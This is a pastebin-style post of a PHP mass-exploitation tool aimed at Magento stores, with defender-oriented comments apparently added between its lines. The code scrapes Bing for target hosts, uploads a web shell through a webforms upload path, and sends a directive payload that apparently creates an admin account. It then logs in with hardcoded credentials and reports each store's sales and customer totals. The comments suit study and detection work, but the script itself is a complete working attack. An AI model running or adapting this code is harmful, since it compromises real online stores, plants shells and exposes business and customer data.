
Ched nayyk ya ghassen

a guest Jan 20th, 2017 78 Never
  1. <?php
  2. error_reporting(0); // silences all PHP errors and warnings for the whole run
  3. set_time_limit(0); // removes the execution time limit, so a run is unbounded
  4.  
  5. class indoxploit_mage_exploit {
         // Helper class of a mass-scanning script aimed at Magento sites: a banner, two cURL
         // wrappers and a substring helper.
         // Traits a defender can match on: every request carries one fixed, very old
         // "Firefox/2.0.0.6" User-Agent string, and ngcurl() switches TLS certificate checks off.
         // The two properties below are declared but not referenced anywhere else in the visible code.
  6.     private $jsvulnpath = "/js/webforms/upload/";
  7.     private $postjs = "files[]";
  8.  
         // Prints the tool's banner to stdout; performs no network activity.
  9.     public function cover() {
  10.         print "[ ========================================== ]\n";
  11.         print "-----> Magento Xploit with Bing Grabber <-----\n";
  12.         print "All in One Package: [webforms,add admin] Xploit\n";
  13.         print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n";
  14.         print "Greetz: IndoXploit - Sanjungan Jiwa\n";
  15.         print "[ ========================================== ]\n\n";
  16.     }
          // Generic HTTP helper: requests $url and returns whatever curl_exec() returns (the
          // response body, since CURLOPT_RETURNTRANSFER is set). $post is sent as a POST body
          // when it passes the loose `!= null` test; otherwise the request is a GET.
          // Redirects are followed, cookies are kept in ./cookie.txt on the operator's machine,
          // and neither the server certificate nor its host name is verified.
          // The curl_close() call sits after the return statement and is never reached.
  17.     public function ngcurl($url,$post=null) {
  18.         $ch = curl_init($url);
  19.         if($post != null) {
  20.             curl_setopt($ch, CURLOPT_POST, true);
  21.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  22.         }
  23.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  25.             curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  26.             curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  27.             curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  28.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  29.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  30.             curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  31.         return curl_exec($ch);
  32.             curl_close($ch);
  33.     }
          // POST helper used by the script only for the admin "directive" request. Sends $post
          // as application/x-www-form-urlencoded with a 60-second timeout and returns the response
          // headers together with the body (CURLOPT_HEADER); the caller searches that text for "200 OK".
          // Unlike ngcurl() it sets no cookie, redirect or TLS options.
          // As in ngcurl(), the curl_close() after the return statement is never reached.
  34.     public function xploit($url, $post) {
  35.         $ch = curl_init();
  36.               curl_setopt($ch, CURLOPT_URL, $url);
  37.               curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  38.               curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  39.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  40.               curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  41.               curl_setopt($ch, CURLOPT_POST, 1);
  42.         $headers  = array();
  43.         $headers[] = 'Accept-Encoding: gzip, deflate';
  44.         $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  45.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  46.               curl_setopt($ch, CURLOPT_HEADER, 1);
  47.         return curl_exec($ch);
  48.               curl_close($ch);
  49.     }
          // Returns the text of $param that lies between the first occurrence of $kata1 and the
          // next occurrence of $kata2 after it. Returns FALSE when either marker is absent.
          // The script calls it on the admin login response to pull out the path segment that
          // follows ".../index/key/".
  50.     public function ambilKata($param, $kata1, $kata2){
  51.         if(strpos($param, $kata1) === FALSE) return FALSE;
  52.         if(strpos($param, $kata2) === FALSE) return FALSE;
  53.         $start = strpos($param, $kata1) + strlen($kata1);
  54.         $end = strpos($param, $kata2, $start);
  55.         $return = substr($param, $start, $end - $start);
  56.         return $return;
  57.     }
  58. }
  59.  
  60. $idx = new indoxploit_mage_exploit();
  61. $shell = "id.php"; // name of a local file that is later submitted to the upload endpoint
  62. $dork = str_replace("'", "", $argv[1]); // search query from the first CLI argument, single quotes stripped
  63. $dork = urlencode($dork); // encoded for use in the search URL's query string
  64. if(isset($dork)) {
          // Flow of this branch: (1) harvest host names from Bing result pages for the query,
          // (2) send the same fixed series of requests to every harvested host, (3) only afterwards
          // check whether the host looks like Magento and print what was found.
          // For defenders the request series itself is the fingerprint. From one client with the
          // fixed Firefox/2.0.0.6 User-Agent, in quick succession: GETs to /index.php/, /downloader/,
          // /index.php//admin/ and /js/webforms/upload/, a POST to /js/webforms/upload/, a POST to
          // /index.php//admin/Cms_Wysiwyg/directive/index/ containing "forwarded=1", then login
          // POSTs using the account name "indoxploit".
          // Hardening that removes what the script depends on: keep the store on a patched release,
          // limit the admin path and /downloader/ to known addresses, make sure upload directories
          // cannot execute PHP, and review the admin user list for accounts nobody created.
  65.     $idx->cover();
  66.     $npage = 1;
  67.     $npages = 30000;
  68.     $allLinks = array();
  69.     $lll = array();
          // Page through Bing results in steps of 10 and collect every result link; the loop ends
          // when a request fails or the page no longer links to the next offset.
  70.     while($npage <= $npages) {
  71.         $x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null);
  72.         if($x) {
  73.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  74.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  75.             $npage = $npage + 10;
  76.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  77.         } else break;
  78.     }
          // Reduce each link to its host part (third "/"-separated field) and de-duplicate.
  79.     $URLs = array();
  80.     foreach($allLinks as $url){
  81.         $exp = explode("/", $url);
  82.         $URLs[] = $exp[2];
  83.     }
  84.     $array = array_filter($URLs);
  85.     $array = array_unique($array);
  86.     $sss = count(array_unique($array));
  87.     print "Load ($sss) sites\n";
  88.     print "<------------------------>\n\n";
  89.     foreach($array as $domain) {
              // $_SESSION is used as an in-process "already handled" marker; no session_start()
              // is visible, and the host list was already de-duplicated above.
  90.         if($_SESSION[$domain]) {
  91.             //
  92.         } else {
  93.         $_SESSION[$domain] = "1";  
  94.         // set var all site + path to x
              // All targets are addressed over plain http. Because $domain_exploit ends in "/",
              // the admin URLs built from it contain a double slash ("/index.php//admin/..."),
              // which is a recognisable detail in access logs.
  95.         $domain = "http://$domain"; // URL TARGET
  96.         $domain_exploit = $domain."/index.php/"; // URL to Exploit
  97.         $domain_exploit_add_admin = $domain_exploit."/admin/Cms_Wysiwyg/directive/index/";
  98.         $domain_downloader = $domain."/downloader/"; // URL to Downloader
  99.         $domain_admin = $domain_exploit."/admin/"; // URL to Admin Page
  100.         $domain_js = $domain."/js/webforms/upload/";
  101.         // end set varr all site + path to x
  102.         print "[+] URL: $domain ";
  103.         // set var all curl page
               // Four plain GET probes; their bodies are only inspected later, in the
               // fingerprint and status checks.
  104.         $cek_web = $idx->ngcurl($domain_exploit, null); // CURL to Index of site
  105.         $cek_downloader = $idx->ngcurl($domain_downloader, null); // CURL to Downloader Site
  106.         $cek_admin = $idx->ngcurl($domain_admin, null); // CURL to Admin Page
  107.         $cek_webforms = $idx->ngcurl($domain_js, null);
  108.         // end var all curl page
  109.  
  110.         // set all exploit webforms
               // POST to the webforms upload path with a "files[]" field that references the local
               // file named in $shell; the "url" value of the response is kept for the report below.
               // Defender check: unexpected .php files under the store's webforms upload directory.
  111.         $post_js = array("files[]" => "@$shell");
  112.         $exploit_js = $idx->ngcurl($domain_js, $post_js);
  113.         preg_match('/"url":"(.*?)"/', $exploit_js, $sh);
  114.         // end set all exploit webforms
  115.  
  116.         // set all exploit add admin
               // Unauthenticated POST to the admin Cms_Wysiwyg "directive" route. The "filter" value
               // is redacted on this page; the ___directive value appears to be base64. Judging by
               // the banner ("add admin") and the fixed-credential login that follows, the request
               // is meant to create an admin account - inferred, not shown by the visible code.
  117.         $postdata = 'filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  118.         $result = $idx->xploit($domain_exploit_add_admin, $postdata);
               // Fetch the admin login page, read its form_key, and attempt a login with the fixed
               // account name and password. Note the page is HTML-escaped before the form_key pattern,
               // which contains literal quotes and angle brackets, is applied to it.
  119.         $ambil = htmlspecialchars(@file_get_contents($domain_admin));
  120.         preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  121.         $post_login = array(
  122.             "form_key" => $key[1],
  123.             "login[username]" => "indoxploit",
  124.             "dummy" => "",
  125.             "login[password]" => "IndoXploit",
  126.         );
  127.         $login_web = $idx->ngcurl($domain_admin, $post_login);
               // Scrape figures from the post-login page (price spans and an order-count span),
               // then request the "filesystem" admin route, the Downloader login and the customer
               // grid, using path keys taken from the login response.
  128.         preg_match_all('#<span class="price">(.*?)</span>#', $login_web, $matches);
  129.         $links = array_unique($matches[1]);
  130.         preg_match_all('/<span class=\"nowrap\" style=\"font-size:18px; color:#EA7601;\">(.*?)<span/', $login_web, $quality);
  131.         $qual = array_unique($quality[1]);
  132.         $key2 = $idx->ambilKata($login_web,"/filesystem/adminhtml_filesystem/index/key/","/");
  133.         $curl_filesystem = $idx->ngcurl($domain_exploit."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
  134.         $post_downloader = array(
  135.             "username" => "indoxploit",
  136.             "password" => "IndoXploit",
  137.         );
  138.         $curl_downloader = $idx->ngcurl($domain_downloader, $post_downloader);
  139.         preg_match_all("/<td class=\"first\">(.*?)<\/td>/", $curl_downloader, $pack);
  140.         $key3 = $idx->ambilKata($login_web,"/customer/index/key/","/");
  141.         $curl_customer = $idx->ngcurl($domain_exploit."/admin/customer/index/key/$key3/", null);
  142.         preg_match_all("/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\/span>/", $curl_customer, $cust);
  143.         // end set all exploit add admin
  144.  
               // The Magento fingerprint check happens only here, after every request above has
               // already been sent. Hosts that are not Magento therefore see the same request
               // series in their logs, which makes the series useful for detection anywhere.
  145.         if(preg_match("/Mage.Cookies.domain/", $cek_web) OR preg_match("/magento/", $cek_downloader) OR preg_match("/magento/", $cek_admin)) {
  146.             print "[Magento]\n";
  147.             print "[ ==================================================== ]\n";
  148.             print "[+] Trying to exploit [Webforms]: ";
  149.             if(preg_match("[]", $cek_webforms) AND !preg_match("/404|Not Found|Error|Forbidden|403/i", $cek_webforms)) {
  150.                 print "Vuln | ";
  151.                 if(preg_match("/{$shell}|webforms/", $exploit_js)) {
  152.                     print "Xploited!\n";
  153.                     print "[+] Shell: ".str_replace("\\", "", $sh[1])."\n";
  154.                 } else {
  155.                     print "Not Xploited.\n";   
  156.                 }
  157.             } else {
  158.                 print "Not Vuln\n";
  159.             }
  160.             print "[+] Trying to exploit [add admin]: ";
                   // "Xploited" here only means the directive response text contained "200 OK";
                   // the login check on the next level is the script's actual success test.
  161.             if(preg_match('#200 OK#', $result)) {
  162.                 print "Xploited! | ";
  163.                 if(preg_match('/Log Out|indoxploit/', $login_web)) {
  164.                     print "[Login: OK]\n";
                           // Impact shown to the operator: sales and customer totals read from
                           // the admin pages, i.e. business data exposed by an admin compromise.
  165.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  166.                     print "[+] Lifetime Sales: ".$links[0]."\n";
  167.                     print "[+] Average Orders: ".$links[1]."\n";
  168.                     print "[+] Quantity Orders: ".$qual[3][0]."\n";
  169.                     print "[+] Total Customers: ".$cust[1][0]." Customers\n";
  170.                     print "[ ====================[ $$$$$$$$ ]==================== ]\n";
  171.                     print "[ ====================[ /\/\/\/\ ]==================== ]\n";
                           // Reports whether two admin-side features answer: a "File System" page
                           // and the Magento Downloader, including whether the Downloader says the
                           // Magento folder is writeable. Both matter for incident scoping, since
                           // they would let an admin-level intruder change files on the server.
  172.                     print "[+] Filesystem: ";
  173.                     if(preg_match("/File System/", $curl_filesystem)) {
  174.                         print "Found!\n";
  175.                     } else {
  176.                         print "Not Found.\n";
  177.                     }
  178.                     print "[+] Downloader: ";
  179.                     if(preg_match("/Magento Downloader/", $cek_downloader)) {
  180.                         print "Found! | ";
  181.                         if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
  182.                             if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  183.                                 $stat_down = "Not Writeable.";
  184.                             } else {
  185.                                 $stat_down = "Writeable";
  186.                             }
  187.                             $in = 0;
  188.                             print "[Login: OK] [$stat_down]\n";
  189.                             //print "[+] Packages installed: \n";
                                   // Only counts the package rows; the names are not printed.
  190.                             foreach($pack[1] as $packages) {
  191.                                 $in++;
  192.                                 //print "-> $packages\n";
  193.                             }
  194.                             print "[+] Installed packages: (".$in.") Packages\n";
  195.                         } else {
  196.                             print "[Login Downloader Failed]\n";
  197.                         }
  198.                     } else {
  199.                         print "[Not Found]\n";
  200.                     }
  201.                     print "[ ====================[ \/\/\/\/ ]==================== ]\n";
  202.                     print "[ ==================================================== ]\n";
                           // The account name and password printed here are the fixed values used
                           // in the login forms above. An admin user named "indoxploit" in a
                           // store's user list is a strong sign that this tool or a variant of it
                           // succeeded there and that the store needs incident response.
  203.                     print "[+] username: indoxploit\n";
  204.                     print "[+] password: IndoXploit\n";
  205.                     print "[+] Login Admin: $domain_admin\n";
  206.                     print "[ ==================================================== ]\n\n";
  207.                 } else {
  208.                     print "[Login Admin Failed]\n\n";
  209.                 }
  210.             } else {
  211.                 print "Not Vuln\n\n";
  212.             }
  213.         } else {
  214.             print "[Not Magento]\n\n";
  215.         }
  216.         }
  217.     }
  218. } else {
           // Usage text for the case where no search query is available.
  219.     print "usage: php ".$argv[0]." 'bing_dork'\n";
  220. }